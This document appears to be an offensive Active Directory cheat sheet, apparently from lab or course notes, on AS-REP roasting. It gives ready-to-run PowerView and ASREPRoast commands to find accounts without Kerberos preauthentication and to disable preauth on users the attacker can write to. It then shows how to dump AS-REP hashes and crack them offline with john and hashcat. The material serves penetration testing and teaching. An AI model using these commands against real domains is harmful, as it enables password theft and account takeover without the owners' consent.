AS-REP Roast

Targeted Kerberoasting - AS-REPs

  • If a user's userAccountControl has the DONT_REQ_PREAUTH flag set (0x400000, "Do not require Kerberos preauthentication"), anyone on the network can request an AS-REP (Authentication Service Response) for that user without proving knowledge of the password. The enc-part of that AS-REP is encrypted with a key derived from the user's password, so it can be brute-forced offline.

  • With GenericWrite or GenericAll over a user object (write access to its userAccountControl attribute is what matters), Kerberos preauth can be force-disabled for that user as well, so the attack also works against users you have write rights over, not only ones that were misconfigured to begin with.

Enumerate accounts with Kerberos Preauth disabled:

# PowerView
Get-DomainUser -PreauthNotRequired -Verbose

# AD module
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

Force-disable Kerberos preauth with PowerView: first enumerate which objects RDPUsers have interesting ACL rights over, then set the flag on a user they can write to and confirm it shows up in the enumeration:

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Set-DomainObject -Identity Control1User -XOR @{useraccountcontrol=4194304} -Verbose

(4194304 is 0x400000, the DONT_REQ_PREAUTH bit. -XOR toggles it rather than setting it, so confirm with Get-DomainUser that the bit was clear beforehand, and run the same command again afterwards to restore the original value.)

Get-DomainUser -PreauthNotRequired -Verbose

Request the encrypted AS-REP for offline bruteforce using the ASREPRoast PowerShell module:

Get-ASREPHash -UserName VPN1user -Verbose

To enumerate all users with Kerberos preauth disabled and request a hash for each of them:

Invoke-ASREPRoast -Verbose

Finally, crack the hashes offline. John (jumbo) recognises the $krb5asrep$ lines directly; hashcat uses mode 18200 for the same $krb5asrep$23$ format:

john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\asrephashes.txt
